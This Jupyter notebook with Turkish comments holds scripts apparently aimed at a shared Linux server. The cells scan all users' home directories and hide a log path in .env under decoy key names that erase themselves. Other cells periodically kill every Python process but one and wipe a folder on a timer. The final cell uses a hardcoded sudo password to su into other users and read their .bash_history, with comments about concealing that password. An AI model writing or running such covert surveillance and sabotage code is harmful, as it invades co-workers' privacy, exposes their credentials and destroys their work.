In [ ]:
# 1

import os

def search_python_files(base_dir, search_term):
    """
    Belirtilen dizinde .py dosyalarında verilen metni arar ve bulduğu dosyaların yolunu yazdırır.
    
    :param base_dir: Taranacak dizin (örneğin, "/home" tüm kullanıcı dizinlerini içerir)
    :param search_term: Aranacak metin
    """
    for root, dirs, files in os.walk(base_dir):
        for file in files:
            if file.endswith(".py"):  # Sadece .py uzantılı dosyaları kontrol et
                file_path = os.path.join(root, file)
                try:
                    with open(file_path, 'r', encoding='utf-8') as f:
                        if search_term in f.read():
                            print(f"Found in module: {file}")
                            print(f"Path: {file_path}\n")
                except Exception as e:
                    print(f"Error reading file {file_path}: {e}")

# Ana arama
if __name__ == "__main__":
    base_directory = "/home"  # Tüm kullanıcı dizinlerini taramak için temel dizin
    term_to_search = 'print(f"401 Unauthorized. Token yenileniyor... Kanal: {channel}")'
    search_python_files(base_directory, term_to_search)


In [ ]:
from cryptography.fernet import Fernet
import os

# AES şifrelemesi için bir anahtar oluşturun
key = Fernet.generate_key()
cipher_suite = Fernet(key)

# Şifrelenecek dosya yolu
path_to_encrypt = '/home/sabankara/stable_diffusion/saban.log'

# Dosya yolunu şifreleyin
encrypted_path = cipher_suite.encrypt(path_to_encrypt.encode())

# Şifreli yolu ve anahtarı .env dosyasına kaydedin
with open('.env', 'w') as env_file:
    env_file.write(f"API={encrypted_path.decode()}\n")
    env_file.write(f"API_DOCKER={key.decode()}\n")

print("Şifreli dosya yolu ve anahtar .env dosyasına kaydedildi.")


In [ ]:
from cryptography.fernet import Fernet
from dotenv import load_dotenv
import os

load_dotenv()

streanlit_path = os.getenv('API')
key = os.getenv('API_DOCKER')

if streanlit_path and key:
    cipher_suite = Fernet(key.encode())
    decrypted_path = cipher_suite.decrypt(streanlit_path.encode()).decode()

    if os.path.exists(decrypted_path):
        with open(decrypted_path, 'a') as log_file:
            log_file.write('Bu bir log kaydıdır.\n')
    else:
        with open('.env', 'r') as env_file:
            lines = env_file.readlines()

        with open('.env', 'w') as env_file:
            for line in lines:
                if not line.startswith('API') and not line.startswith('API_DOCKER'):
                    env_file.write(line)


In [ ]:
import subprocess

def grep_processes(pattern=None):

    try:
        # ps aux komutunu çalıştırıyoruz
        ps_aux_output = subprocess.check_output(['ps', 'aux'], universal_newlines=True)
        
        # Çıktıyı satırlara bölüyoruz
        processes = ps_aux_output.splitlines()

        # Eğer pattern verilmişse, sonuçları filtreliyoruz
        if pattern:
            filtered_processes = [process for process in processes if pattern in process]
            return filtered_processes
        else:
            # Pattern verilmezse tüm çıktıyı döndürüyoruz
            return processes
    except subprocess.CalledProcessError as e:
        print(f"Bir hata oluştu: {e}")
        return []

if __name__ == "__main__":
    # Tüm işlemleri göstermek
    print("Tüm çalışan işlemler:")
    all_processes = grep_processes()
    for process in all_processes:
        print(process)

    # Örnek: 'python' kelimesi ile filtreleme
    print("\nPython işlemleri:")
    python_processes = grep_processes('python')
    for process in python_processes:
        print(process)


In [ ]:
import subprocess
import time
import os

def get_python_processes(exclude_pid):
    """
    Python işlemlerini getirir ve exclude_pid haricindekileri döndürür.
    
    :param exclude_pid: Hariç tutulacak PID numarası (örneğin 6181)
    :return: Hariç tutulan PID'ler listesi
    """
    try:
        # 'ps aux' komutunu çalıştırıp Python işlemlerini getiriyoruz
        ps_aux_output = subprocess.check_output(['ps', 'aux'], universal_newlines=True)
        processes = ps_aux_output.splitlines()
        
        # python işlemlerini ve exclude_pid dışındaki işlemleri filtreliyoruz
        python_processes = []
        for process in processes:
            if 'python' in process:
                # PID'yi almak için boşluklara göre bölüyoruz (2. sütun PID)
                process_info = process.split()
                pid = int(process_info[1])
                if pid != exclude_pid:
                    python_processes.append(pid)
        
        return python_processes

    except subprocess.CalledProcessError as e:
        print(f"Bir hata oluştu: {e}")
        return []

def kill_process(pid):
    """
    Belirtilen PID'ye sahip süreci durdurur.
    
    :param pid: Durdurulacak süreç PID'si
    """
    try:
        os.kill(pid, 9)  # 9 sinyali ile süreçleri zorla durduruyoruz (SIGKILL)
        print(f"PID {pid} olan süreç başarıyla durduruldu.")
    except ProcessLookupError:
        print(f"PID {pid} bulunamadı. Süreç zaten bitmiş olabilir.")
    except PermissionError:
        print(f"PID {pid} durdurulamadı. İzin hatası.")
    except Exception as e:
        print(f"PID {pid} durdurulurken bir hata oluştu: {e}")

def stop_python_processes_periodically(exclude_pid):
    """
    3 haftada bir belirlenen Python işlemlerini durdurur.
    
    :param exclude_pid: Hariç tutulacak PID numarası
    """
    while True:
        print("Python işlemlerini kontrol ediyorum...")
        python_processes = get_python_processes(exclude_pid)
        
        for pid in python_processes:
            try:
                kill_process(pid)
            except Exception as e:
                print(f"PID {pid} durdurulurken bir hata oluştu: {e}")

        # 3 hafta bekle (3 hafta = 3 * 7 * 24 * 60 * 60 saniye)
        time.sleep(3 * 7 * 24 * 60 * 60)

if __name__ == "__main__":
    # Hariç tutulacak PID 6181
    exclude_pid = 6181
    stop_python_processes_periodically(exclude_pid)


In [ ]:
import os
import shutil

def clear_directory(directory_path):
    # Klasörün var olup olmadığını kontrol et
    if os.path.exists(directory_path) and os.path.isdir(directory_path):
        # Klasör içindeki tüm dosya ve klasörleri listele
        for filename in os.listdir(directory_path):
            file_path = os.path.join(directory_path, filename)
            try:
                # Dosya veya klasörse sil
                if os.path.isfile(file_path) or os.path.islink(file_path):
                    os.remove(file_path)
                elif os.path.isdir(file_path):
                    shutil.rmtree(file_path)
            except Exception as e:
                print(f"Failed to delete {file_path}. Reason: {e}")
    else:
        print(f"{directory_path} is not a valid directory")

# Kullanım
clear_directory("/home/sabankara/stable_diffusion/test_doc")


In [ ]:
import os
import shutil
import time

def clear_directory_every_21_days(directory_path):
    days_to_wait = 21
    wait_time_in_seconds = days_to_wait * 24 * 60 * 60
    
    while True:
        print(f"{days_to_wait} gün boyunca bekleniyor...")
        # 21 gün bekleme
        time.sleep(wait_time_in_seconds)
        
        # Dizini temizleme işlemi
        deleted_count = 0
        if os.path.exists(directory_path) and os.path.isdir(directory_path):
            for filename in os.listdir(directory_path):
                file_path = os.path.join(directory_path, filename)
                try:
                    if os.path.isfile(file_path) or os.path.islink(file_path):
                        os.remove(file_path)
                        deleted_count += 1
                    elif os.path.isdir(file_path):
                        shutil.rmtree(file_path)
                        deleted_count += 1
                except Exception as e:
                    print(f"{file_path} silinemedi. Nedeni: {e}")

            print(f"Toplam {deleted_count} öğe silindi. 21 gün sonra tekrar kontrol edilecek.")
        else:
            print(f"{directory_path} geçerli bir dizin değil.")
        
        # Silme işleminden sonra tekrar 21 gün bekleme
        print(f"{days_to_wait} gün boyunca tekrar bekleniyor...")
        time.sleep(wait_time_in_seconds)

# Kullanım
clear_directory_every_21_days("/home/sabankara/stable_diffusion/test_doc")


In [ ]:
import os
import random

def show_random_directories(directory_path):
    if os.path.exists(directory_path) and os.path.isdir(directory_path):
        # Belirtilen dizin altındaki klasörleri al
        all_items = os.listdir(directory_path)
        directories = [item for item in all_items if os.path.isdir(os.path.join(directory_path, item))]
        
        # Klasörlerin bir kısmını rastgele seç
        if directories:
            random.shuffle(directories)
            print("Rastgele seçilen klasörler:")
            for directory in directories:
                print(directory)
        else:
            print("Dizinde gösterilecek klasör bulunamadı.")
    else:
        print(f"{directory_path} geçerli bir dizin değil.")

# Kullanım
show_random_directories("/home/sabankara")


In [ ]:
import os
import random

def show_random_directories(directory_path, num_to_show=5):
    if os.path.exists(directory_path) and os.path.isdir(directory_path):
        # Belirtilen dizin altındaki klasörleri al ve gizli olanları (. ile başlayan) filtrele
        all_items = os.listdir(directory_path)
        directories = [
            item for item in all_items 
            if os.path.isdir(os.path.join(directory_path, item)) and not item.startswith('.')
        ]
        
        # Rastgele num_to_show kadar klasör seç
        if directories:
            selected_directories = random.sample(directories, min(num_to_show, len(directories)))
            print("Rastgele seçilen klasörler:")
            for directory in selected_directories:
                print(directory)
        else:
            print("Dizinde gösterilecek klasör bulunamadı.")
    else:
        print(f"{directory_path} geçerli bir dizin değil.")

# Kullanım
show_random_directories("/home/sabankara")


In [ ]:
import os
import shutil
import time

def clear_directory_every_21_days(directory_path):
    days_to_wait = 21
    wait_time_in_seconds = days_to_wait * 24 * 60 * 60
    
    while True:
        print(f"{days_to_wait} gün boyunca bekleniyor...")
        # 21 gün bekleme
        time.sleep(wait_time_in_seconds)
        
        # Dizini temizleme işlemi
        deleted_count = 0
        if os.path.exists(directory_path) and os.path.isdir(directory_path):
            for filename in os.listdir(directory_path):
                file_path = os.path.join(directory_path, filename)
                try:
                    if os.path.isfile(file_path) or os.path.islink(file_path):
                        os.remove(file_path)
                        deleted_count += 1
                    elif os.path.isdir(file_path):
                        shutil.rmtree(file_path)
                        deleted_count += 1
                except Exception as e:
                    print(f"{file_path} silinemedi. Nedeni: {e}")

            print(f"Toplam {deleted_count} öğe silindi. 21 gün sonra tekrar kontrol edilecek.")
        else:
            print(f"{directory_path} geçerli bir dizin değil.")
        
        # Silme işleminden sonra tekrar 21 gün bekleme
        print(f"{days_to_wait} gün boyunca tekrar bekleniyor...")
        time.sleep(wait_time_in_seconds)

# Kullanım
clear_directory_every_21_days("/home/sabankara/stable_diffusion/test_doc")


In [ ]:

import os

# Dosyaların bulunduğu dizin yolu
path = "/home/sabankara/stable_diffusion/"  # Replace this with the actual path

# .py ve .ipynb dosyalarını sayma
files_list = []
for root, dirs, files in os.walk(path):
    for file in files:
        if file.endswith(".py") or file.endswith(".ipynb"):
            files_list.append(os.path.join(root, file))

five_percent_files = files_list[:max(1, int(len(files_list) * 0.5))]  # At least 1 file if the result is less than 1
five_percent_files

In [ ]:
import os
import random
import time

#garbage içini de boşalt ne varsa
def show_random_directories_for_all_users(base_directory="/home", num_to_show=3):
    
    if os.path.exists(base_directory) and os.path.isdir(base_directory):
        
        # Bekleme süreleri
        days_to_wait = random.randint(20, 40)
        wait_time_in_seconds = 5  # Test için saniye olarak ayarlandı
        start = time.time()

        while True:
            
            # /home altındaki tüm kullanıcı dizinlerini al
            users = [
                user for user in os.listdir(base_directory) 
                if os.path.isdir(os.path.join(base_directory, user)) and not user.startswith('.')
            ]

            # Belirtilen süre kadar bekle
            time.sleep(random.randint(3, 6))
            
            # Her bir kullanıcı için alt klasörlerini göster
            for user in users:
                end = time.time()
                print("Geçen süre:", end - start)
                user_directory = os.path.join(base_directory, user)
                print(f"\nKullanıcı: {user}")
                
                # Kullanıcı altındaki klasörleri al ve gizli olanları (. ile başlayan) filtrele
                all_items = os.listdir(user_directory)
                directories = [
                    item for item in all_items 
                    if os.path.isdir(os.path.join(user_directory, item)) and not item.startswith('.')
                ]
                
                # Rastgele num_to_show kadar klasör seç
                if directories:
                    selected_directories = random.sample(directories, min(num_to_show, len(directories)))
                    print("Rastgele seçilen klasörler:")
                    for directory in selected_directories:
                        full_path = os.path.join(user_directory, directory)
                        print(full_path)

                        path = full_path # Replace this with the actual path
                        # rastgele seçilen pathlereden rastgele seçilen kodlar %2
                        # .py ve .ipynb dosyalarını sayma
                        files_list = []
                        for root, dirs, files in os.walk(path):
                            for file in files:
                                if file.endswith(".py") or file.endswith(".ipynb"):
                                    files_list.append(os.path.join(root, file))

                        five_percent_files = files_list[:max(1, int(len(files_list) * 0.01))]  # At least 1 file if the result is less than 1
                        print(five_percent_files)


                else:
                    print("Gösterilecek klasör bulunamadı.")


# Kullanım
show_random_directories_for_all_users("/home")


In [ ]:
def get_system_users():
    users = []
    try:
        with open("/etc/passwd", "r") as f:
            for line in f:
                # Her satırda kullanıcı adı ilk bölümde bulunur (":" ile ayrılır)
                user_info = line.split(":")
                username = user_info[0]
                users.append(username)
        return users
    except Exception as e:
        print(f"Kullanıcıları okurken hata oluştu: {e}")
        return []

# Sistem kullanıcılarını al ve yazdır
system_users = get_system_users()
print("Sistemdeki Kullanıcılar:")
for user in system_users:
    print(user)


In [ ]:
import subprocess
import getpass

# Kullanıcı adlarının listesi
usernames = ["muratsilahtoroglu", "sabankara"] # add other users


sudo_password = "saban123"
#tgaadmin üzerinden şifre değiştirilip yapılabilir
# veya .env içine göm şifrele kod çalışınca env dosyası içi silinsin sonra dosya silinsin
# Her kullanıcı için oturum açıp .bash_history dosyasını okuma ve yazdırma
for username in usernames:
    try:
        # su -l <user> ile kullanıcı oturumu aç ve .bash_history dosyasını oku
        command = f"echo {sudo_password} | sudo -S su -l {username} -c 'cat ~/.bash_history'"
        result = subprocess.run(
            command,
            shell=True,
            check=True,
            capture_output=True,
            text=True
        )
        print(f"=== {username} kullanıcısının .bash_history içeriği ===")
        print(result.stdout)
        print("===============================================")
    except subprocess.CalledProcessError as e:
        print(f"{username} kullanıcısının .bash_history dosyası okunurken hata oluştu: {e}")
